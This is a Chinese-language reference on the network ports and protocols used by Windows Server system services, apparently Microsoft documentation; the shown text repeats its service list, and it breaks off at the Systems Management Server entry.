本部分提供对每个系统服务的说明,包括与系统服务相对应的逻辑名称,还显示了每个服务所需的端口和协议。
应用程序层网关服务
Internet 连接共享 (ICS)/Windows 防火墙服务的这个子组件对允许网络协议通过防火墙并在 Internet 连接共享后面工作的插件提供支持。应用程序层网关 (ALG) 插件可以打开端口和更改嵌入在数据包内的数据(如端口和 IP 地址)。文件传输协议 (FTP) 是唯一具有 Windows Server 2003 标准版和 Windows Server 2003 企业版附带的一个插件的网络协议。ALG FTP 插件旨在通过这些组件使用的网络地址转换 (NAT) 引擎来支持活动的 FTP 会话。ALG FTP 插件通过重定向所有通过 NAT 的流量和发送到通向环回适配器上 3000 到 5000 范围内的专用侦听端口的端口 21 的流量来支持这些会话。ALG FTP 插件随后监视并更新 FTP 控制通道流量,以便 FTP 插件能够通过 FTP 数据通道的 NAT 转发端口映射。FTP 插件还更新 FTP 控制通道流中的端口。
系统服务名称:ALG 应用程序协议 协议 端口
FTP 控制 TCP 21
ASP.NET 状态服务
ASP.NET 状态服务支持 ASP.NET 进程外会话状态。ASP.NET 状态服务在进程外存储会话数据。此服务使用套接字与 Web 服务器上运行的 ASP.NET 通信。
系统服务名称:aspnet_state 应用程序协议 协议 端口
ASP.NET 会话状态 TCP 42424
证书服务
证书服务是核心操作系统的一部分。使用证书服务,企业可以充当它自己的证书颁发机构 (CA)。通过这种方法,企业可以颁发和管理程序和协议(如安全/多用途 Internet 邮件扩展 (S/MIME)、安全套接字层 (SSL)、加密文件系统 (EFS)、IPSec 以及智能卡登录)的数字证书。证书服务使用高于端口 1024 的随机 TCP 端口,依赖 RPC 和 DCOM 与客户机通信。
系统服务名称:CertSvc 应用程序协议 协议 端口
RPC TCP 135
随机分配的高 TCP 端口 TCP 随机端口号
群集服务
“群集”服务控制服务器群集操作并管理群集数据库。群集是充当单个计算机的独立计算机的集合。管理员、程序员和用户将群集看作一个系统。此软件在群集节点之间分发数据。如果一个节点失败了,其他节点将提供原来由丢失的节点提供的服务和数据。当添加或修复了某个节点后,群集软件将一些数据迁移到此节点。
系统服务名称:ClusSvc 应用程序协议 协议 端口
群集服务 UDP 3343
RPC TCP 135
随机分配的高 TCP 端口 TCP 随机端口号
计算机浏览器
“计算机浏览器”系统服务维护网络上的最新计算机列表,并应程序的请求提供此列表。基于 Windows 的计算机使用“计算机浏览器”服务来查看网络域和资源。被指定为浏览器的计算机维护浏览列表,这些列表中包含网络上使用的所有共享资源。Windows 程序的早期版本(如“网上邻居”、net view 命令以及 Windows 资源管理器)都需要浏览功能。例如,当您在一台运行 Microsoft Windows 95 的计算机上打开“网上邻居”时,就会出现域和计算机的列表。为了显示此列表,计算机从被指定为浏览器的计算机上获取浏览列表的副本。
系统服务名称:Browser 应用程序协议 协议 端口
NetBIOS 数据报服务 UDP 138
NetBIOS 名称解析 UDP 137
NetBIOS 会话服务 TCP 139
DHCP 服务器
“DHCP 服务器”服务使用动态主机配置协议 (DHCP) 自动分配 IP 地址。使用此服务,可以调整 DHCP 客户机的高级网络设置。例如,可以配置诸如域名系统 (DNS) 服务器和 Windows Internet 名称服务 (WINS) 服务器之类的网络设置。可以建立一个或更多的 DHCP 服务器来维护 TCP/IP 配置信息并向客户计算机提供此信息。
系统服务名称:DHCPServer 应用程序协议 协议 端口
DHCP 服务器 UDP 67
MADCAP UDP 2535
分布式文件系统
“分布式文件系统 (DFS)”服务管理分布在局域网 (LAN) 或广域网 (WAN) 上的逻辑卷,它对 Microsoft Active Directory 目录服务 SYSVOL 共享是必需的。DFS 是将不同的文件共享集成为一个逻辑命名空间的分布式服务。
系统服务名称:Dfs 应用程序协议 协议 端口
NetBIOS 数据报服务 UDP 138
NetBIOS 会话服务 TCP 139
LDAP 服务器 TCP 389
LDAP 服务器 UDP 389
SMB TCP 445
RPC TCP 135
随机分配的高 TCP 端口 TCP 随机端口号
分布式链接跟踪服务器
“分布式链接跟踪服务器”系统服务存储信息,使得在卷之间移动的文件可以跟踪到域中的每个卷。“分布式链接跟踪服务器”服务运行在一个域中的所有域控制器上。此服务启用“分布式链接跟踪服务器客户机”服务以跟踪已移动到同一个域中另一个 NTFS 文件系统中某个位置的链接文档。
系统服务名称:TrkSvr 应用程序协议 协议 端口
RPC TCP 135
随机分配的高 TCP 端口 TCP 随机端口号
分布式事务处理协调器
“分布式事务处理协调器 (DTC)”系统服务负责协调跨计算机系统和资源管理器分布的事务,如数据库、消息队列、文件系统和其他事务保护资源管理器。如果事务性组件是通过 COM+ 配置的,就需要 DTC 系统服务。消息队列(也称作 MSMQ)中的事务性队列和 SQL Server 跨多系统运行也需要 DTC 系统服务。
系统服务名称:MSDTC 应用程序协议 协议 端口
RPC TCP 135
随机分配的高 TCP 端口 TCP 随机端口号
DNS Server
“DNS 服务器”服务通过应答有关 DNS 名称的查询和更新请求来启用 DNS 名称解析。查找使用 DNS 标识的设备和服务以及在 Active Directory 中查找域控制器都需要 DNS 服务器。
系统服务名称:DNS 应用程序协议 协议 端口
DNS UDP 53
DNS TCP 53
事件日志
“事件日志”系统服务记录由程序和 Windows 操作系统生成的事件消息。事件日志报告中包含对诊断问题有用的信息。在事件查看器中查看报告。事件日志服务将程序、服务以及操作系统发送的事件写入日志文件。这些事件中不仅包含特定于源程序、服务或组件的错误,还包含诊断信息。日志可以通过事件日志 API 或通过 MMC 的管理单元中的事件查看器以编程方式查看。
系统服务名称:Eventlog 应用程序协议 协议 端口
RPC TCP 135
随机分配的高 TCP 端口 TCP 随机端口号
Exchange Server
Microsoft Exchange Server 包括几个系统服务。当 MAPI 客户机(如 Microsoft Outlook)连接到 Exchange Server 时,客户机先连接到 TCP 端口 135 上的 RPC 终结点映射器(RPC 定位器服务)。RPC 终结点映射器告诉客户机使用哪些端口连接到 Exchange Server 服务。这些端口是动态分配的。Microsoft Exchange Server 5.5 使用两个端口:一个用于信息存储,一个用于目录。Microsoft Exchange 2000 Server 和 Microsoft Exchange Server 2003 使用三个端口:一个用于信息存储,两个用于系统助理。通过使用 HTTP 上的 RPC,还可以使用 Microsoft Office Outlook 2003 连接到运行 Exchange Server 2003 的服务器。Exchange 服务器还支持其他协议,如 SMTP、邮局协议 3 (POP3) 以及 IMAP。
应用程序协议 协议 端口
IMAP TCP 143
SSL 上的 IMAP TCP 993
POP3 TCP 110
SSL 上的 POP3 TCP 995
随机分配的高 TCP 端口 TCP 随机端口号
RPC TCP 135
HTTP 上的 RPC TCP 593
SMTP TCP 25
SMTP UDP 25
传真服务
传真服务、符合 Telephony API (TAPI) 的系统服务,提供传真功能。使用传真服务,用户可以使用本地传真设备或共享的网络传真设备,从他们的桌面程序发送和接收传真。
系统服务名称:Fax 应用程序协议 协议 端口
NetBIOS 会话服务 TCP 139
RPC TCP 135
随机分配的高 TCP 端口 TCP 随机端口号
SMB TCP 445
文件复制
文件复制服务 (FRS) 允许同时在许多服务器上自动复制和维护文件。FRS 是 Windows 2000 和 Windows Server 2003 中的自动文件复制服务,其功能是将 SYSVOL 共享复制到所有的域控制器。此外,还可以将 FRS 配置为在与容错 DFS 关联的备用目标之间复制文件。
系统服务名称:NtFrs 应用程序协议 协议 端口
RPC TCP 135
随机分配的高 TCP 端口 TCP 随机端口号
Macintosh 文件服务器
使用“Macintosh 文件服务器”系统服务,Macintosh 计算机用户可以在运行 Windows Server 2003 的计算机上存储和访问文件。如果此服务被关闭或被禁止,Macintosh 客户机将无法在此计算机上访问或存储文件。
系统服务名称:MacFile 应用程序协议 协议 端口
Macintosh 文件服务器 TCP 548
FTP 发布服务
FTP 发布服务提供 FTP 连接。默认情况下,FTP 控制端口为 21。不过,通过“Internet 信息服务 (IIS) 管理器”管理单元可以配置此系统服务。默认数据端口(即主动模式 FTP 使用的端口)自动设置为比控制端口低一个端口。因此,如果将控制端口配置为端口 4131,则默认数据端口为端口 4130。大多数 FTP 客户机都使用被动模式 FTP。这表示客户机最初使用控制端口连接到 FTP 服务器,FTP 服务器分配一个介于 1025 和 5000 之间的高 TCP 端口,然后客户机打开另一个 FTP 服务器连接以传递数据。可以使用 IIS 元数据库配置高端口的范围。
系统服务名称:MSFTPSVC 应用程序协议 协议 端口
FTP 控制 TCP 21
FTP 默认数据 TCP 20
随机分配的高 TCP 端口 TCP 随机端口号
HTTP SSL
HTTP SSL 系统服务使 IIS 能够执行 SSL 功能。SSL 是一个开放式标准,用于建立加密的通信通道以帮助防止拦截重要信息(如信用卡号码)。尽管此服务旨在处理其他 Internet 服务,但它主要用于启用万维网 (WWW) 上的加密电子金融交易。通过“Internet 信息服务 (IIS) 管理器”管理单元可以配置用于此服务的端口。
系统服务名称:HTTPFilter 应用程序协议 协议 端口
HTTPS TCP 443
Internet 身份验证服务
Internet 验证服务 (IAS) 对正在连接到网络的用户执行集中式身份验证、授权、审核以及计帐。这些用户可以在 LAN 连接上,也可以在远程连接上。IAS 实现 Internet 工程任务组 (IETF) 标准远程身份验证拨入用户服务 (RADIUS) 协议。
系统服务名称:IAS 应用程序协议 协议 端口
旧式 RADIUS UDP 1645
旧式 RADIUS UDP 1646
RADIUS 计帐 UDP 1813
RADIUS 身份验证 UDP 1812
Windows 防火墙/Internet 连接共享 (ICS)
此系统服务为家庭网络或小型办公室网络上的所有计算机提供 NAT、寻址以及名称解析服务。当启用 Internet 连接共享功能时,您的计算机就变成网络上的“Internet 网关”,然后其他客户计算机可以共享一个 Internet 连接,如拨号连接或宽带连接。此服务提供基本的 DHCP 服务和 DNS 服务,但它也适用于功能完备的 Windows DHCP 服务或 DNS 服务。当 ICF 和 Internet 连接共享充当网络上其他计算机的网关时,它们在内部网络接口上为专用网络提供 DHCP 服务和 DNS 服务。它们不在面向外部的接口上提供这些服务。
系统服务名称:SharedAccess 应用程序协议 协议 端口
DHCP 服务器 UDP 67
DNS UDP 53
DNS TCP 53
Kerberos 密钥分发中心
当您使用 Kerberos 密钥分发中心 (KDC) 系统服务时,用户可以使用 Kerberos 版本 5 身份验证协议登录到网络。与在 Kerberos 协议的其他实现中一样,KDC 是一个提供两个服务的进程:身份验证服务和票证授予服务。身份验证服务颁发票证授予票证,票证授予服务颁发用于连接到自己的域中的计算机的票证。
系统服务名称:kdc 应用程序协议 协议 端口
Kerberos TCP 88
Kerberos UDP 88
许可证记录
“许可证记录”系统服务是一个工具,当初设计它是为了帮助用户管理服务器客户机访问许可证 (CAL) 模型中授权的 Microsoft 服务器产品的许可证。许可证记录是随 Microsoft Windows NT Server 3.51 引入的。默认情况下,在 Windows Server 2003 中“许可证记录”服务是禁用的。由于原始设计的限制和许可协议条款和条件发展的原因,“许可证记录”可能不会提供一个购买的 CAL 总数与在一个特定服务器上或在企业范围内使用的 CAL 总数相比较的精确视图。“许可证记录”报告的 CAL 可能会与“最终用户许可协议 (EULA)”的解释和“产品使用权 (PUR)”相冲突。Windows 操作系统的将来版本中将不包括许可证记录。Microsoft 仅建议 Microsoft Small Business Server 系列操作系统的用户在服务器上启用此服务。
系统服务名称:LicenseService 应用程序协议 协议 端口
NetBIOS 数据报服务 UDP 138
NetBIOS 会话服务 TCP 139
SMB TCP 445 下表列出了本文所包含的信息的概述: 本文的“系统服务端口”部分包含对每个服务的简短说明,显示该服务的逻辑名称,并指出每个服务进行正确操作所需的端口和协议。使用此部分可帮助识别特定的服务所使用的端口和协议。
本文的“端口与协议”部分中包括一个表,其中总结了“系统服务端口”部分中的信息。这个表是按端口号排序的,而不是按服务名称排序的。使用此部分可以迅速确定哪些服务侦听特定的端口。
本文在某些术语的使用上采用了特定的方式。为了避免混淆,请确保对本文使用这些术语的方式有所了解。下表对这些术语进行了说明:
系统服务:Windows 服务器系统包括许多产品,如 Microsoft Windows Server 2003 系列、Microsoft Exchange 2000 Server 和 Microsoft SQL Server 2000。所有这些产品都包括许多组件,系统服务就是这些组件之一。特定计算机所需的系统服务或者由操作系统在启动期间自动启动,或者根据需要在典型操作期间启动。例如,在运行 Windows Server 2003 企业版的计算机上,一些可用的系统服务包括服务器服务、后台打印程序服务以及万维网发布服务。每个系统服务都有一个好记的服务名称和一个服务名称。好记的服务名称是图形管理工具(如“服务”Microsoft 管理控制台 (MMC) 管理单元)中出现的名称。服务名称是用于命令行工具以及许多脚本语言的名称。每个系统服务可以提供一项或多项网络服务。
应用程序协议:在本文中,应用程序协议是指使用一个或多个 TCP/IP 协议和端口的高级网络协议。应用程序协议的实例包括超文本传输协议 (HTTP)、服务器消息块 (SMB) 和简单邮件传输协议 (SMTP)。
协议:TCP/IP 协议在低于应用程序协议的级别上运行,它是网络上的设备之间进行通信的标准格式。TCP/IP 协议套件包括 TCP、用户数据报协议 (UDP) 以及 Internet 控制消息协议 (ICMP)。
端口:这是系统服务侦听传入的网络通信的网络端口。
本文没有指定哪些服务依赖于其他服务进行网络通信。例如,许多服务依赖 Microsoft Windows 中的远程过程调用 (RPC) 功能或 DCOM 功能为它们分配动态 TCP 端口。远程过程调用服务通过其他使用 RPC 或 DCOM 与客户计算机通信的系统服务来协调请求。许多其他服务依赖于网络基本输入/输出系统 (NetBIOS)、SMB、协议(实际上是由服务器服务提供的)。其他服务依赖于 HTTP 或安全超文本传输协议 (HTTPS)。这些协议是由 Internet 信息服务 (IIS) 提供的。有关 Windows 操作系统基础结构的完整讨论已超出本文讨论的范围。不过,在 Microsoft TechNet 和 Microsoft Developer Network (MSDN) 上可以获得有关此主题的详细文档。虽然许多服务可能都依赖于某个特定的 TCP 端口或 UDP 端口,但仅有一个服务或进程可以随时主动侦听此端口。
将 RPC 与 TCP/IP 或 UDP/IP 一起用于传输时,入站端口常常按照需要动态分配给系统服务;使用高于端口 1024 的 TCP/IP 端口和 UDP/IP 端口。这些端口常常被非正式地称为“随机 RPC 端口”。在这些情况下,RPC 客户端依赖 RPC 终结点映射器通知它们哪个(些)动态端口分配给了服务器。对于某些基于 RPC 的服务,您可以配置一个特定的端口而不是让 RPC 动态分配端口。另外,无论对于什么服务,都可以将 RPC 动态分配的端口范围限制为一个小范围。有关此主题的更多信息,请参见本文的“参考”部分。
本文包含有关本文结尾的“适用于”部分中所列出的 Microsoft 产品的系统服务角色和服务器角色的信息。虽然此信息可能同样适用于 Microsoft Windows XP 和 Microsoft Windows 2000 Professional,但本文主要集中讨论服务器类操作系统。因此,本文介绍了服务侦听的端口,而没有介绍客户端程序用来连接到远程系统的端口。
返回页首
系统服务端口
本部分提供对每个系统服务的说明,包括与系统服务相对应的逻辑名称,还显示了每个服务所需的端口和协议。
应用程序层网关服务
Internet 连接共享 (ICS)/Windows 防火墙服务的这个子组件对允许网络协议通过防火墙并在 Internet 连接共享后面工作的插件提供支持。应用程序层网关 (ALG) 插件可以打开端口和更改嵌入在数据包内的数据(如端口和 IP 地址)。文件传输协议 (FTP) 是唯一具有 Windows Server 2003 标准版和 Windows Server 2003 企业版附带的一个插件的网络协议。ALG FTP 插件旨在通过这些组件使用的网络地址转换 (NAT) 引擎来支持活动的 FTP 会话。ALG FTP 插件通过重定向所有通过 NAT 的流量和发送到通向环回适配器上 3000 到 5000 范围内的专用侦听端口的端口 21 的流量来支持这些会话。ALG FTP 插件随后监视并更新 FTP 控制通道流量,以便 FTP 插件能够通过 FTP 数据通道的 NAT 转发端口映射。FTP 插件还更新 FTP 控制通道流中的端口。
系统服务名称:ALG 应用程序协议 协议 端口
FTP 控制 TCP 21
ASP.NET 状态服务
ASP.NET 状态服务支持 ASP.NET 进程外会话状态。ASP.NET 状态服务在进程外存储会话数据。此服务使用套接字与 Web 服务器上运行的 ASP.NET 通信。
系统服务名称:aspnet_state 应用程序协议 协议 端口
ASP.NET 会话状态 TCP 42424
证书服务
证书服务是核心操作系统的一部分。使用证书服务,企业可以充当它自己的证书颁发机构 (CA)。通过这种方法,企业可以颁发和管理程序和协议(如安全/多用途 Internet 邮件扩展 (S/MIME)、安全套接字层 (SSL)、加密文件系统 (EFS)、IPSec 以及智能卡登录)的数字证书。证书服务使用高于端口 1024 的随机 TCP 端口,依赖 RPC 和 DCOM 与客户机通信。
系统服务名称:CertSvc 应用程序协议 协议 端口
RPC TCP 135
随机分配的高 TCP 端口 TCP 随机端口号
群集服务
“群集”服务控制服务器群集操作并管理群集数据库。群集是充当单个计算机的独立计算机的集合。管理员、程序员和用户将群集看作一个系统。此软件在群集节点之间分发数据。如果一个节点失败了,其他节点将提供原来由丢失的节点提供的服务和数据。当添加或修复了某个节点后,群集软件将一些数据迁移到此节点。
系统服务名称:ClusSvc 应用程序协议 协议 端口
群集服务 UDP 3343
RPC TCP 135
随机分配的高 TCP 端口 TCP 随机端口号
计算机浏览器
“计算机浏览器”系统服务维护网络上的最新计算机列表,并应程序的请求提供此列表。基于 Windows 的计算机使用“计算机浏览器”服务来查看网络域和资源。被指定为浏览器的计算机维护浏览列表,这些列表中包含网络上使用的所有共享资源。Windows 程序的早期版本(如“网上邻居”、net view 命令以及 Windows 资源管理器)都需要浏览功能。例如,当您在一台运行 Microsoft Windows 95 的计算机上打开“网上邻居”时,就会出现域和计算机的列表。为了显示此列表,计算机从被指定为浏览器的计算机上获取浏览列表的副本。
系统服务名称:Browser 应用程序协议 协议 端口
NetBIOS 数据报服务 UDP 138
NetBIOS 名称解析 UDP 137
NetBIOS 会话服务 TCP 139
DHCP 服务器
“DHCP 服务器”服务使用动态主机配置协议 (DHCP) 自动分配 IP 地址。使用此服务,可以调整 DHCP 客户机的高级网络设置。例如,可以配置诸如域名系统 (DNS) 服务器和 Windows Internet 名称服务 (WINS) 服务器之类的网络设置。可以建立一个或更多的 DHCP 服务器来维护 TCP/IP 配置信息并向客户计算机提供此信息。
系统服务名称:DHCPServer 应用程序协议 协议 端口
DHCP 服务器 UDP 67
MADCAP UDP 2535
分布式文件系统
“分布式文件系统 (DFS)”服务管理分布在局域网 (LAN) 或广域网 (WAN) 上的逻辑卷,它对 Microsoft Active Directory 目录服务 SYSVOL 共享是必需的。DFS 是将不同的文件共享集成为一个逻辑命名空间的分布式服务。
系统服务名称:Dfs 应用程序协议 协议 端口
NetBIOS 数据报服务 UDP 138
NetBIOS 会话服务 TCP 139
LDAP 服务器 TCP 389
LDAP 服务器 UDP 389
SMB TCP 445
RPC TCP 135
随机分配的高 TCP 端口 TCP 随机端口号
分布式链接跟踪服务器
“分布式链接跟踪服务器”系统服务存储信息,使得在卷之间移动的文件可以跟踪到域中的每个卷。“分布式链接跟踪服务器”服务运行在一个域中的所有域控制器上。此服务启用“分布式链接跟踪服务器客户机”服务以跟踪已移动到同一个域中另一个 NTFS 文件系统中某个位置的链接文档。
系统服务名称:TrkSvr 应用程序协议 协议 端口
RPC TCP 135
随机分配的高 TCP 端口 TCP 随机端口号
分布式事务处理协调器
“分布式事务处理协调器 (DTC)”系统服务负责协调跨计算机系统和资源管理器分布的事务,如数据库、消息队列、文件系统和其他事务保护资源管理器。如果事务性组件是通过 COM+ 配置的,就需要 DTC 系统服务。消息队列(也称作 MSMQ)中的事务性队列和 SQL Server 跨多系统运行也需要 DTC 系统服务。
系统服务名称:MSDTC 应用程序协议 协议 端口
RPC TCP 135
随机分配的高 TCP 端口 TCP 随机端口号
DNS Server
“DNS 服务器”服务通过应答有关 DNS 名称的查询和更新请求来启用 DNS 名称解析。查找使用 DNS 标识的设备和服务以及在 Active Directory 中查找域控制器都需要 DNS 服务器。
系统服务名称:DNS 应用程序协议 协议 端口
DNS UDP 53
DNS TCP 53
事件日志
“事件日志”系统服务记录由程序和 Windows 操作系统生成的事件消息。事件日志报告中包含对诊断问题有用的信息。在事件查看器中查看报告。事件日志服务将程序、服务以及操作系统发送的事件写入日志文件。这些事件中不仅包含特定于源程序、服务或组件的错误,还包含诊断信息。日志可以通过事件日志 API 或通过 MMC 的管理单元中的事件查看器以编程方式查看。
系统服务名称:Eventlog 应用程序协议 协议 端口
RPC TCP 135
随机分配的高 TCP 端口 TCP 随机端口号
Exchange Server
Microsoft Exchange Server 包括几个系统服务。当 MAPI 客户机(如 Microsoft Outlook)连接到 Exchange Server 时,客户机先连接到 TCP 端口 135 上的 RPC 终结点映射器(RPC 定位器服务)。RPC 终结点映射器告诉客户机使用哪些端口连接到 Exchange Server 服务。这些端口是动态分配的。Microsoft Exchange Server 5.5 使用两个端口:一个用于信息存储,一个用于目录。Microsoft Exchange 2000 Server 和 Microsoft Exchange Server 2003 使用三个端口:一个用于信息存储,两个用于系统助理。通过使用 HTTP 上的 RPC,还可以使用 Microsoft Office Outlook 2003 连接到运行 Exchange Server 2003 的服务器。Exchange 服务器还支持其他协议,如 SMTP、邮局协议 3 (POP3) 以及 IMAP。
应用程序协议 协议 端口
IMAP TCP 143
SSL 上的 IMAP TCP 993
POP3 TCP 110
SSL 上的 POP3 TCP 995
随机分配的高 TCP 端口 TCP 随机端口号
RPC TCP 135
HTTP 上的 RPC TCP 593
SMTP TCP 25
SMTP UDP 25
传真服务
传真服务、符合 Telephony API (TAPI) 的系统服务,提供传真功能。使用传真服务,用户可以使用本地传真设备或共享的网络传真设备,从他们的桌面程序发送和接收传真。
系统服务名称:Fax 应用程序协议 协议 端口
NetBIOS 会话服务 TCP 139
RPC TCP 135
随机分配的高 TCP 端口 TCP 随机端口号
SMB TCP 445
文件复制
文件复制服务 (FRS) 允许同时在许多服务器上自动复制和维护文件。FRS 是 Windows 2000 和 Windows Server 2003 中的自动文件复制服务,其功能是将 SYSVOL 共享复制到所有的域控制器。此外,还可以将 FRS 配置为在与容错 DFS 关联的备用目标之间复制文件。
系统服务名称:NtFrs 应用程序协议 协议 端口
RPC TCP 135
随机分配的高 TCP 端口 TCP 随机端口号
Macintosh 文件服务器
使用“Macintosh 文件服务器”系统服务,Macintosh 计算机用户可以在运行 Windows Server 2003 的计算机上存储和访问文件。如果此服务被关闭或被禁止,Macintosh 客户机将无法在此计算机上访问或存储文件。
系统服务名称:MacFile 应用程序协议 协议 端口
Macintosh 文件服务器 TCP 548
FTP 发布服务
FTP 发布服务提供 FTP 连接。默认情况下,FTP 控制端口为 21。不过,通过“Internet 信息服务 (IIS) 管理器”管理单元可以配置此系统服务。默认数据端口(即主动模式 FTP 使用的端口)自动设置为比控制端口低一个端口。因此,如果将控制端口配置为端口 4131,则默认数据端口为端口 4130。大多数 FTP 客户机都使用被动模式 FTP。这表示客户机最初使用控制端口连接到 FTP 服务器,FTP 服务器分配一个介于 1025 和 5000 之间的高 TCP 端口,然后客户机打开另一个 FTP 服务器连接以传递数据。可以使用 IIS 元数据库配置高端口的范围。
系统服务名称:MSFTPSVC 应用程序协议 协议 端口
FTP 控制 TCP 21
FTP 默认数据 TCP 20
随机分配的高 TCP 端口 TCP 随机端口号
HTTP SSL
HTTP SSL 系统服务使 IIS 能够执行 SSL 功能。SSL 是一个开放式标准,用于建立加密的通信通道以帮助防止拦截重要信息(如信用卡号码)。尽管此服务旨在处理其他 Internet 服务,但它主要用于启用万维网 (WWW) 上的加密电子金融交易。通过“Internet 信息服务 (IIS) 管理器”管理单元可以配置用于此服务的端口。
系统服务名称:HTTPFilter 应用程序协议 协议 端口
HTTPS TCP 443
Internet 身份验证服务
Internet 验证服务 (IAS) 对正在连接到网络的用户执行集中式身份验证、授权、审核以及计帐。这些用户可以在 LAN 连接上,也可以在远程连接上。IAS 实现 Internet 工程任务组 (IETF) 标准远程身份验证拨入用户服务 (RADIUS) 协议。
系统服务名称:IAS 应用程序协议 协议 端口
旧式 RADIUS UDP 1645
旧式 RADIUS UDP 1646
RADIUS 计帐 UDP 1813
RADIUS 身份验证 UDP 1812
Windows 防火墙/Internet 连接共享 (ICS)
此系统服务为家庭网络或小型办公室网络上的所有计算机提供 NAT、寻址以及名称解析服务。当启用 Internet 连接共享功能时,您的计算机就变成网络上的“Internet 网关”,然后其他客户计算机可以共享一个 Internet 连接,如拨号连接或宽带连接。此服务提供基本的 DHCP 服务和 DNS 服务,但它也适用于功能完备的 Windows DHCP 服务或 DNS 服务。当 ICF 和 Internet 连接共享充当网络上其他计算机的网关时,它们在内部网络接口上为专用网络提供 DHCP 服务和 DNS 服务。它们不在面向外部的接口上提供这些服务。
系统服务名称:SharedAccess 应用程序协议 协议 端口
DHCP 服务器 UDP 67
DNS UDP 53
DNS TCP 53
Kerberos 密钥分发中心
当您使用 Kerberos 密钥分发中心 (KDC) 系统服务时,用户可以使用 Kerberos 版本 5 身份验证协议登录到网络。与在 Kerberos 协议的其他实现中一样,KDC 是一个提供两个服务的进程:身份验证服务和票证授予服务。身份验证服务颁发票证授予票证,票证授予服务颁发用于连接到自己的域中的计算机的票证。
系统服务名称:kdc 应用程序协议 协议 端口
Kerberos TCP 88
Kerberos UDP 88
许可证记录
“许可证记录”系统服务是一个工具,当初设计它是为了帮助用户管理服务器客户机访问许可证 (CAL) 模型中授权的 Microsoft 服务器产品的许可证。许可证记录是随 Microsoft Windows NT Server 3.51 引入的。默认情况下,在 Windows Server 2003 中“许可证记录”服务是禁用的。由于原始设计的限制和许可协议条款和条件发展的原因,“许可证记录”可能不会提供一个购买的 CAL 总数与在一个特定服务器上或在企业范围内使用的 CAL 总数相比较的精确视图。“许可证记录”报告的 CAL 可能会与“最终用户许可协议 (EULA)”的解释和“产品使用权 (PUR)”相冲突。Windows 操作系统的将来版本中将不包括许可证记录。Microsoft 仅建议 Microsoft Small Business Server 系列操作系统的用户在服务器上启用此服务。
系统服务名称:LicenseService 应用程序协议 协议 端口
NetBIOS 数据报服务 UDP 138
NetBIOS 会话服务 TCP 139
SMB TCP 445 SharePoint Portal Server
使用 SharePoint Portal Server 系统服务,可以开发一个智能门户,它将用户、团队和知识紧密地联系起来,使人们能够在不同的业务流程之间利用相关的信息。Microsoft SharePoint Portal Server 2003 提供了一个企业业务解决方案,该方案通过单次登录和企业应用集成功能,将来自不同系统的信息集成到一个解决方案中。
应用程序协议 协议 端口
HTTP TCP 80
HTTPS TCP 443
简单邮件传输协议 (SMTP)
简单邮件传输协议 (SMTP) 系统服务是电子邮件提交和中继代理。它接受发往远程目标的电子邮件并将它们排队,并以指定的时间间隔进行检索。Windows 域控制器将 SMTP 服务用于站点间基于电子邮件的复制。Windows Server 2003 COM 组件的协作数据对象 (CDO) 可以使用 SMTP 服务提交出站电子邮件并将它们排队。
系统服务名称:SMTPSVC 应用程序协议 协议 端口
SMTP TCP 25
SMTP UDP 25
简单 TCP/IP 服务
简单 TCP/IP 服务实现了对以下协议的支持:
Echo,端口 7,RFC 862
Discard,端口 9,RFC 863
Character Generator,端口 19,RFC 864
Daytime,端口 13,RFC 867
Quote of the Day,端口 17,RFC 865
系统服务名称:SimpTcp 应用程序协议 协议 端口
Chargen TCP 19
Chargen UDP 19
Daytime TCP 13
Daytime UDP 13
Discard TCP 9
Discard UDP 9
Echo TCP 7
Echo UDP 7
Quotd TCP 17
Quoted UDP 17
SMS 远程控制代理
SMS 远程控制代理是 Microsoft Systems Management Server (SMS) 2003 中的一项系统服务。SMS 远程控制代理为 Microsoft 操作系统的更改和配置管理提供了一个全面的解决方案。使用该解决方案,组织可以为用户提供相关的软件和更新程序。
系统服务名称:Wuser32 应用程序协议 协议 端口
SMS 远程聊天 TCP 2703
SMS 远程聊天 UDP 2703
SMS 远程控制(控件) TCP 2701
SMS 远程控制(控件) UDP 2701
SMS 远程控制(数据) TCP 2702
SMS 远程控制(数据) UDP 2702
SMS 远程文件传输 TCP 2704
SMS 远程文件传输 UDP 2704
SNMP 服务
SNMP 服务允许本地计算机处理传入的简单网络管理协议 (SNMP) 请求。SNMP 服务中包含监视网络设备活动并向网络控制台工作站报告的代理。SNMP 服务提供了从位于中央位置并且运行网络管理软件的计算机(如工作站或服务器计算机、路由器、网桥和集线器)管理网络主机的方法。SNMP 使用分布式管理系统和代理结构来执行管理服务。
系统服务名称:SNMP 应用程序协议 协议 端口
SNMP UDP 161
SNMP 陷阱服务
SNMP 陷阱服务接收由本地或远程 SNMP 代理生成的陷阱消息,然后将这些消息转发给您的计算机上运行的 SNMP 管理程序。为代理配置了 SNMP 陷阱服务后,如果发生任何特定的事件,都将生成陷阱消息。这些消息被发送到陷阱目标。例如,可以将代理配置为在无法识别的管理系统发送信息请求时启动身份验证陷阱。陷阱目标包括管理系统的计算机名称、IP 地址或网间数据包交换 (IPX) 地址。陷阱目标必须是启用网络并且运行 SNMP 管理软件的主机。
系统服务名称:SNMPTRAP 应用程序协议 协议 端口
SNMP 陷阱出站 UDP 162
SQL 分析服务器
“SQL 分析服务器”系统服务是 SQL Server 2000 的一个组件。使用 SQL 分析服务器,您可以创建并管理 OLAP 多维数据集和数据挖掘模型。分析服务器可以访问本地和远程数据源以便创建和存储多维数据集或数据挖掘模型。
应用程序协议 协议 端口
SQL 分析服务 TCP 2725
SQL Server:下层 OLAP 客户端支持
当 SQL 分析服务器必须支持来自下层(OLAP 服务 7.0)客户端的连接时,SQL Server 2000 使用该系统服务。这些是 SQL 7.0 使用 OLAP 服务的默认端口。
应用程序协议 协议 端口
OLAP Services 7.0 TCP 2393
OLAP Services 7.0 TCP 2394
SSDP 发现服务
SSDP 发现服务将“简单服务发现协议 (SSDP)”实现为 Windows 服务。SSDP 发现服务管理设备存在通知回执,更新其缓存,并将这些通知连同未决的搜索请求一起传递给客户端。SSDP 发现服务还接受来自客户端的事件回调注册,将它们转变为订阅请求,并监视事件通知。然后将这些请求传递给已注册的回调。该系统服务还为宿主设备提供定期通知。当前,SSDP 事件通知服务使用 TCP 端口 5000。从下一个 Windows XP service pack 开始,它将依赖于 TCP 端口 2869。
注意:在撰写本文时,当前的 Windows XP Service Pack 级别为 Windows XP Service Pack 1 (SP1)。
系统服务名称:SSDPRSR 应用程序协议 协议 端口
SSDP UDP 1900
SSDP 事件通知 TCP 2869
SSDP 旧事件通知 TCP 5000
Systems Management Server 2.0
